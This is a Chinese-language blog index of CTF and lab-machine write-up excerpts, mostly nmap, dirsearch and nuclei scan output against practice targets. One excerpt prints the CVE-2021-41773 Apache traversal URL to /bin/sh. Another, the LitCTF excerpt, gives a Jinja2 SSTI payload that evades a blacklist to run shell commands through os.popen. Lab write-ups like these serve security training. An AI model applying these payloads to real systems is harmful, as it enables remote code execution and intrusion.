VulnVM-Manage

Box Info OS Difficulty Linux Easy Nmap [root@kali] /home/kali/manage ❯ nmap 192.168.55.66 -sV -A -p- PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.62 (Debian) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 MAC Address: 08:00:27:01:D6:2B (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Dirsearch [root@kali] /home/kali/manage ❯ dirsearch -u 'http://192.168.55.66' ⏎ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://192.168.55.66/ [23:33:52] Scanning: [23:33:53] 403 - 278B - /.php [23:33:55] 200 - 11KB - /admin.php [23:34:01] 200 - 10KB - /index.html [23:34:05] 403 - 278B - /server-status/ [23:34:05] 403 - 278B - /server-status Task Completed 好像不存在SQL注入问题,也无法爆破登录,现在来看看445端口 ...

2025年05月31日 · 3 分钟 · 1278 字 · HYH

VulNyx-Build

Box Info OS Difficulty Windows Low Nmap [root@kali] /home/kali ❯ nmap 192.168.55.68 -sV -A -p- Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 8080/tcp open http Jetty 12.0.19 |_http-server-header: Jetty(12.0.19) |_http-title: Site doesn't have a title (text/html;charset=utf-8). | http-robots.txt: 1 disallowed entry |_/ 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:9C:A2:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose Running: Microsoft Windows 10 OS CPE: cpe:/o:microsoft:windows_10 OS details: Microsoft Windows 10 1709 - 21H2 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 14h59m58s | smb2-time: | date: 2025-06-01T03:03:58 |_ start_date: N/A |_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9c:a2:bb (PCS Systemtechnik/Oracle VirtualBox virtual NIC) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Jenkins RCE 来到8080端口,默认的用户凭证就是admin/admin ...

2025年05月31日 · 2 分钟 · 576 字 · HYH

Dockerlabs-LogisticCloud

Nmap [root@kali] /home/kali/LogisticCloud ❯ nmap 172.17.0.2 -sV -A -p- ⏎ Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 22:07 EDT Nmap scan report for 172.17.0.2 Host is up (0.00011s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 e9:59:86:db:ea:af:ff:09:ee:8f:ab:c6:0d:b8:b5:82 (ECDSA) |_ 256 ff:8d:9f:f8:e7:a5:f4:ce:6a:2d:e4:30:ac:77:18:fc (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Login - HLG Logistics | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set 9000/tcp open http Golang net/http server |_http-title: Site doesn't have a title (application/xml). |_http-server-header: MinIO | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 303 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | X-Amz-Request-Id: 18442BF4BCD11059 | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Fri, 30 May 2025 02:08:05 GMT | <?xml version="1.0" encoding="UTF-8"?> | <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>18442BF4BCD11059</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error> | GenericLines, Help, RTSPRequest, SSLSessionReq: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 276 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | X-Amz-Request-Id: 18442BF13C1B8666 | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Fri, 30 May 2025 02:07:50 GMT | <?xml version="1.0" encoding="UTF-8"?> | <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>18442BF13C1B8666</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error> | HTTPOptions: | HTTP/1.0 200 OK | Vary: Origin | Date: Fri, 30 May 2025 02:07:50 GMT |_ Content-Length: 0 9001/tcp open http Golang net/http server |_http-server-header: MinIO Console |_http-title: MinIO Console | fingerprint-strings: | GenericLines, SSLSessionReq: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest, HTTPOptions: | HTTP/1.0 200 OK | Accept-Ranges: bytes | Content-Length: 1309 | Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; script-src 'self' https://unpkg.com; connect-src 'self' https://unpkg.com; | Content-Type: text/html | Last-Modified: Fri, 30 May 2025 02:07:50 GMT | Referrer-Policy: strict-origin-when-cross-origin | Server: MinIO Console | X-Content-Type-Options: nosniff | X-Frame-Options: DENY | X-Xss-Protection: 1; mode=block | Date: Fri, 30 May 2025 02:07:50 GMT |_ <!doctype html><html lang="en"><head><meta charset="utf-8"/><base href="/"/><meta content="width=device-width,initial-scale=1" name="viewport"/><meta content="#081C42" media="(prefers-color-scheme: light)" name="theme-color"/><meta content="#081C42" media="(prefers-color-scheme: dark)" name="theme-color"/><meta content="MinIO Console" name="description"/><meta name="minio-license" content="agpl"/><link href="./s AWS 进入80端口可以找到一个登录框,尝试爆破登陆失败,查看一下网页源码,发现了一个特殊的值huguelogistics-data,并且name是bucket ...

2025年05月30日 · 3 分钟 · 1182 字 · HYH

Dockerlabs-Thedog

NMAP [root@kali] /home/kali/thedog ❯ nmap 172.17.0.2 -sV -A -p- PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.49 ((Unix)) |_http-title: Comando Ping | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.49 (Unix) MAC Address: 02:42:AC:11:00:02 (Unknown) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Nuclei [root@kali] /home/kali/thedog ❯ nuclei -u http://172.17.0.2 ⏎ __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.4.2 projectdiscovery.io [INF] Current nuclei version: v3.4.2 (outdated) [INF] Current nuclei-templates version: v10.2.2 (latest) [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 65 [INF] Templates loaded for current scan: 7991 [INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates [WRN] Loading 198 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] Templates clustered: 1743 (Reduced 1638 Requests) [INF] Using Interactsh Server: oast.me [CVE-2021-41773:RCE] [http] [high] http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh [http-trace:trace-request] [http] [info] http://172.17.0.2 [http-trace:options-request] [http] [info] http://172.17.0.2 [missing-sri] [http] [info] http://172.17.0.2 ["https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"] [waf-detect:apachegeneric] [http] [info] http://172.17.0.2 [http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://172.17.0.2 [http-missing-security-headers:content-security-policy] [http] [info] http://172.17.0.2 [http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://172.17.0.2 [http-missing-security-headers:referrer-policy] [http] [info] http://172.17.0.2 [http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://172.17.0.2 [http-missing-security-headers:strict-transport-security] [http] [info] http://172.17.0.2 [http-missing-security-headers:permissions-policy] [http] [info] http://172.17.0.2 [http-missing-security-headers:x-frame-options] [http] [info] http://172.17.0.2 [http-missing-security-headers:x-content-type-options] [http] [info] http://172.17.0.2 [http-missing-security-headers:clear-site-data] [http] [info] http://172.17.0.2 [http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://172.17.0.2 [tech-detect:jsdelivr] [http] [info] http://172.17.0.2 [tech-detect:bootstrap] [http] [info] http://172.17.0.2 [apache-detect] [http] [info] http://172.17.0.2 ["Apache/2.4.49 (Unix)"] [options-method] [http] [info] http://172.17.0.2 ["GET,POST,OPTIONS,HEAD,TRACE"] CVE-2021-41773 经过信息收集,得到以下命令执行的方式 ...

2025年05月30日 · 2 分钟 · 640 字 · HYH

HTB-Fluffy

Box Info OS Difficulty Windows Easy As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990! Nmap [root@kali] /home/kali/Fluffy ❯ nmap Fluffy.htb -sV -T4 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 添加dc01.fluffy.htb到/etc/host ...

2025年05月29日 · 6 分钟 · 2729 字 · HYH

HTB-Puppy

Box Info OS Difficult Windows Medium As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025! Nmap [root@kali] /home/kali/Puppy ❯ nmap puppy.htb -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos 111/tcp open rpcbind 2-4 (RPC #100000) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2049/tcp open nlockmgr 1-4 (RPC #100021) 3260/tcp open iscsi? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) RPC [root@kali] /home/kali/Puppy ❯ rpcclient 10.xx.xx.xx -U levi.james ⏎ Password for [WORKGROUP\levi.james]: rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[levi.james] rid:[0x44f] user:[ant.edwards] rid:[0x450] user:[adam.silver] rid:[0x451] user:[jamie.williams] rid:[0x452] user:[steph.cooper] rid:[0x453] user:[steph.cooper_adm] rid:[0x457] rpcclient $> 得到一个用户列表 ...

2025年05月28日 · 6 分钟 · 2727 字 · HYH

LitCTF-2025

LITCTF2025 Web 星愿信箱 经过测试是SSTI,可以通过设置变量绕过黑名单 {% set os = (lipsum | attr('__globals__')) | attr('get')('os') %} {% set popen = os | attr('popen') %} {% set input_cmd = "head /flag" %} {% set cmd = popen(input_cmd).read() %} {% print cmd %} nest_js 弱密码,登录就有flag ...

2025年05月26日 · 3 分钟 · 1475 字 · HYH

HackMyVM-Homelab

Box Info OS Linux Difficulty Medium Nmap [root@kali] /home/kali/homelab ❯ nmap 192.168.55.41 -sV -A -p- PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.62 ((Unix)) |_http-favicon: Apache on Mac OS X |_http-title: Mac OS X Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.62 (Unix) 只有80端口开放了 Dir Fuzz [root@kali] /home/kali/homelab ❯ dirsearch -u http://192.168.55.41 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://192.168.55.41/ [04:47:54] Scanning: [04:48:00] 200 - 820B - /cgi-bin/printenv [04:48:00] 200 - 1KB - /cgi-bin/test-cgi [04:48:01] 200 - 4KB - /error.html [04:48:01] 200 - 8KB - /favicon.ico [04:48:02] 200 - 5KB - /index.html [04:48:05] 301 - 313B - /script -> http://192.168.55.41/script/ [04:48:05] 403 - 276B - /script/ [04:48:06] 301 - 314B - /service -> http://192.168.55.41/service/ [04:48:06] 301 - 319B - /service?Wsdl -> http://192.168.55.41/service/?Wsdl [04:48:06] 301 - 312B - /style -> http://192.168.55.41/style/ [04:48:10] 403 - 276B - /server-status/ [04:48:11] 403 - 276B - /server-status Task Completed [root@kali] /home/kali/homelab ❯ curl http://192.168.55.41/service/ Whoa! But sorry, this service is only available for myself!# 看到有一个service路径,但是好像需要认证 ...

2025年05月17日 · 8 分钟 · 3694 字 · HYH

Dockerlabs-Ciberguard

Machine Info OS Linux Difficulty Medium Nmap [root@kali] /home/kali/ciberguard ❯ nmap 172.17.0.2 -sV -A -p- PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 01:f6:3a:98:23:dc:8b:00:f0:5c:d5:50:07:f9:ec:e7 (ECDSA) |_ 256 b0:4e:cb:2a:e0:ac:cf:4c:14:7b:23:57:00:6d:12:1d (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: CyberGuard - Seguridad Digital Feroxbuster [root@kali] /home/kali/ciberguard ❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://172.17.0.2/ 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, txt] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 301 GET 9l 28w 309c http://172.17.0.2/images => http://172.17.0.2/images/ 200 GET 77l 154w 2111c http://172.17.0.2/archiv/script.js 200 GET 311l 560w 5015c http://172.17.0.2/archiv/styles.css 200 GET 231l 1204w 142716c http://172.17.0.2/images/Imagen(1).jpg 200 GET 59l 323w 28431c http://172.17.0.2/images/Image.jpg 200 GET 103l 363w 5100c http://172.17.0.2/ 200 GET 279l 1484w 159900c http://172.17.0.2/images/Imagen%282%29.jpg 200 GET 12l 114w 7473c http://172.17.0.2/images/Iconn.png 200 GET 190l 1007w 91180c http://172.17.0.2/images/Imagen%285%29.png.jpg 200 GET 195l 1148w 120954c http://172.17.0.2/images/Imagen%283%29.jpg 200 GET 243l 1220w 121023c http://172.17.0.2/images/Imagen%284%29.jpg 200 GET 231l 1204w 142716c http://172.17.0.2/images/Imagen%281%29.jpg 301 GET 9l 28w 309c http://172.17.0.2/archiv => http://172.17.0.2/archiv/ 403 GET 9l 28w 275c http://172.17.0.2/server-status [####################] - 29s 661689/661689 0s found:14 errors:1341 [####################] - 28s 661638/661638 23558/s http://172.17.0.2/ [####################] - 0s 661638/661638 3576422/s http://172.17.0.2/images/ => Directory listing (add --scan-dir-listings to scan) [####################] - 0s 661638/661638 330819000/s http://172.17.0.2/archiv/ => Directory listing (add --scan-dir-listings to scan) Own chloe 查看到目录下有一个**/archiv/script.js** ...

2025年05月13日 · 4 分钟 · 1528 字 · HYH

HTB-Planning

Box Info OS Linux Difficulty Easy As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r Nmap [root@kali] /home/kali/Planning ❯ nmap planning.htb -sV -A PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA) |_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-server-header: nginx/1.24.0 (Ubuntu) |_http-title: Edukate - Online Education Website 80端口没有什么可以利用的东西,尝试爆破子域名 ...

2025年05月12日 · 2 分钟 · 772 字 · HYH